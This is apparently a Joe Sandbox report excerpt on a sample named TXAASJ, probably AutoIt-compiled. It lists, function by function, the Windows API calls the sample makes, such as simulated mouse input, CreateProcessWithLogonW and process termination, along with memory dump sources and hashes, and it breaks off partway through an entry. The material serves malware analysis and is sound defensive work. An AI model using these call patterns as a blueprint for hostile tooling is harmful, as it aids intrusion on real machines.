                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 642888154-0
                                                                                                                        • Opcode ID: 5a7281811405253b689005ddedd236aa03596d9fc1e86deda197fc66e58b32fa
                                                                                                                        • Instruction ID: 5e9c12244d735130ff00b23ad37fff69b613d0241d8bd9dd95d616d819d8931b
                                                                                                                        • Opcode Fuzzy Hash: 5a7281811405253b689005ddedd236aa03596d9fc1e86deda197fc66e58b32fa
                                                                                                                        • Instruction Fuzzy Hash: 66415134605240EFDB15CF54C899BD57BF5BB06308F1881B5EA58AF2B2C731A845CB51
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00EA7D81,?,?,00000000,00000001), ref: 00EA9FFA
                                                                                                                          • Part of subcall function 00EA6B19: GetWindowRect.USER32(?,?), ref: 00EA6B2C
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EAA024
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EAA02B
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EAA05D
                                                                                                                          • Part of subcall function 00E98355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EAA089
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EAA0EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4137160315-0
                                                                                                                        • Opcode ID: 43c9a0339ebf7d6024f38230a02685bf8368960bad1604dc858997ff9576df99
                                                                                                                        • Instruction ID: e3e4f0239849222615ac2a7c46c8220dd44c3afdc3f340604d1e647bcc30c2f4
                                                                                                                        • Opcode Fuzzy Hash: 43c9a0339ebf7d6024f38230a02685bf8368960bad1604dc858997ff9576df99
                                                                                                                        • Instruction Fuzzy Hash: 7831F272505305AFD720DF24EC85B9AB7E9FF89314F04092AF599EB191DB31E908CB92
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E8BCD9
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E8BCE0
                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E8BCEF
                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00E8BCFA
                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E8BD29
                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E8BD3D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1413079979-0
                                                                                                                        • Opcode ID: f3b3bb6def3077b6cce1e52a2477a79ebd76e648b32a0c2c87a7d16dde47ae48
                                                                                                                        • Instruction ID: b7ef625e88a1c93fb95652477dd50908c2f51f0f7c21c15982b7b40827f25e3a
                                                                                                                        • Opcode Fuzzy Hash: f3b3bb6def3077b6cce1e52a2477a79ebd76e648b32a0c2c87a7d16dde47ae48
                                                                                                                        • Instruction Fuzzy Hash: 4D218B72145209AFCF01AFA9ED49BEE7BA9EF44308F045015FA08B6161C776CD65DB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E6B5EB
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B5FA
                                                                                                                          • Part of subcall function 00E6B58B: BeginPath.GDI32(?), ref: 00E6B611
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B63B
                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EBE9F2
                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00EBEA06
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EBEA14
                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00EBEA24
                                                                                                                        • EndPath.GDI32(00000000), ref: 00EBEA34
                                                                                                                        • StrokePath.GDI32(00000000), ref: 00EBEA44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 43455801-0
                                                                                                                        • Opcode ID: cfccc80269c8e1dcf3ea2c93fb334c94c251671215e9beff4ffaabe172543458
                                                                                                                        • Instruction ID: 4e69457d1045e3bad404de215b4ed3c575a094bd9088b1aef51c65d435129880
                                                                                                                        • Opcode Fuzzy Hash: cfccc80269c8e1dcf3ea2c93fb334c94c251671215e9beff4ffaabe172543458
                                                                                                                        • Instruction Fuzzy Hash: 8611C97600514DBFDF129F91EC88EDA7FADFB08364F048012FA1969160D7719D59DBA0
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00E8EFB6
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E8EFC7
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E8EFCE
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00E8EFD6
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E8EFED
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00E8EFFF
                                                                                                                          • Part of subcall function 00E8A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00E8A79D,00000000,00000000,?,00E8AB73), ref: 00E8B2CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 603618608-0
                                                                                                                        • Opcode ID: c1d596344428c919337a405f6c6532d061035973efbe227affa4c788a36e846e
                                                                                                                        • Instruction ID: ab68562f575b4e9671993e689baf19efdf96601a1fd18ed114606d9186859cad
                                                                                                                        • Opcode Fuzzy Hash: c1d596344428c919337a405f6c6532d061035973efbe227affa4c788a36e846e
                                                                                                                        • Instruction Fuzzy Hash: CD018875A41209BFEB109BA69C45B5EBFB8EB48355F044066FA08BB390D6709C00CB61
                                                                                                                        APIs
                                                                                                                        • __init_pointers.LIBCMT ref: 00E787D7
                                                                                                                          • Part of subcall function 00E71E5A: __initp_misc_winsig.LIBCMT ref: 00E71E7E
                                                                                                                          • Part of subcall function 00E71E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E78BE1
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E78BF5
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E78C08
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E78C1B
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E78C2E
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E78C41
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E78C54
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E78C67
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E78C7A
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E78C8D
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E78CA0
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E78CB3
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E78CC6
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E78CD9
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E78CEC
                                                                                                                          • Part of subcall function 00E71E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E78CFF
                                                                                                                        • __mtinitlocks.LIBCMT ref: 00E787DC
                                                                                                                          • Part of subcall function 00E78AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00F0AC68,00000FA0,?,?,00E787E1,00E76AFA,00F067D8,00000014), ref: 00E78AD1
                                                                                                                        • __mtterm.LIBCMT ref: 00E787E5
                                                                                                                          • Part of subcall function 00E7884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E787EA,00E76AFA,00F067D8,00000014), ref: 00E789CF
                                                                                                                          • Part of subcall function 00E7884D: _free.LIBCMT ref: 00E789D6
                                                                                                                          • Part of subcall function 00E7884D: DeleteCriticalSection.KERNEL32(00F0AC68,?,?,00E787EA,00E76AFA,00F067D8,00000014), ref: 00E789F8
                                                                                                                        • __calloc_crt.LIBCMT ref: 00E7880A
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E78833
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2942034483-0
                                                                                                                        • Opcode ID: 2ed1f3f449d269fe277a1ff63a70e75ab33e52f3d5126164ffc06d6aef7a52de
                                                                                                                        • Instruction ID: dd66d4829bef83170569b1ec22c956d1c0a0d597099e3165c55d898eaaa91f7a
                                                                                                                        • Opcode Fuzzy Hash: 2ed1f3f449d269fe277a1ff63a70e75ab33e52f3d5126164ffc06d6aef7a52de
                                                                                                                        • Instruction Fuzzy Hash: 59F090321997115AF2687B787E0F64A2AD0DF21778BA4FA2AF46DF50D2FF1088425151
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1423608774-0
                                                                                                                        APIs
                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E51898
                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E518A0
                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E518AB
                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E518B6
                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E518BE
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E518C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4278518827-0
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E98504
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E9851A
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00E98529
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E98538
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E98542
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E98549
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 839392675-0
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00E9A330
                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A341
                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A34E
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A35B
                                                                                                                          • Part of subcall function 00E99CCE: CloseHandle.KERNEL32(?,?,00E9A368,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E99CD8
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E9A36E
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00EC66D3,?,?,?,?,?,00E5E681), ref: 00E9A375
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3495660284-0
                                                                                                                        APIs
                                                                                                                        • _memmove.LIBCMT ref: 00E5C419
                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00E96653,?,?,00000000), ref: 00E5C495
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead_memmove
                                                                                                                        • String ID: Sf
                                                                                                                        • API String ID: 1325644223-3555655682
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00E5BBD9: _memmove.LIBCMT ref: 00E5BC33
                                                                                                                        • __swprintf.LIBCMT ref: 00E6D98F
                                                                                                                        Strings
                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E6D832
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAB4A8
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00EAB5B7
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00EAB73A
                                                                                                                          • Part of subcall function 00E9A6F6: VariantInit.OLEAUT32(00000000), ref: 00E9A736
                                                                                                                          • Part of subcall function 00E9A6F6: VariantCopy.OLEAUT32(?,?), ref: 00E9A73F
                                                                                                                          • Part of subcall function 00E9A6F6: VariantClear.OLEAUT32(?), ref: 00E9A74B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53BCF: _wcscpy.LIBCMT ref: 00E53BF2
                                                                                                                        • _memset.LIBCMT ref: 00E95E56
                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00E95E85
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E95F31
                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E95F5B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                        • Opcode ID: 27f12653ff74509a6b0ded85a7df24694a971fee6a386fc7d603e0a890df8a64
                                                                                                                        • Instruction ID: 4a2048182017f25b22563e48f1667b28a442fd6d54b25d02312b5d8138facdb8
                                                                                                                        • Opcode Fuzzy Hash: 27f12653ff74509a6b0ded85a7df24694a971fee6a386fc7d603e0a890df8a64
                                                                                                                        • Instruction Fuzzy Hash: 075105736187019ADB169B28C844AABB7E4EF45328F082A2EF995F31D0DB70CD448792
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E910B8
                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E910EE
                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E910FF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E91181
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                        • String ID: DllGetClassObject
                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                        • Opcode ID: 62348466fb1008419ecbe9c6d9d086940e824fd316f08e38675fac94cfec6b48
                                                                                                                        • Instruction ID: da23628e95b8eb7592b7e869df3844ec7129c0ad7c99c98c11b7f7fa43b77df8
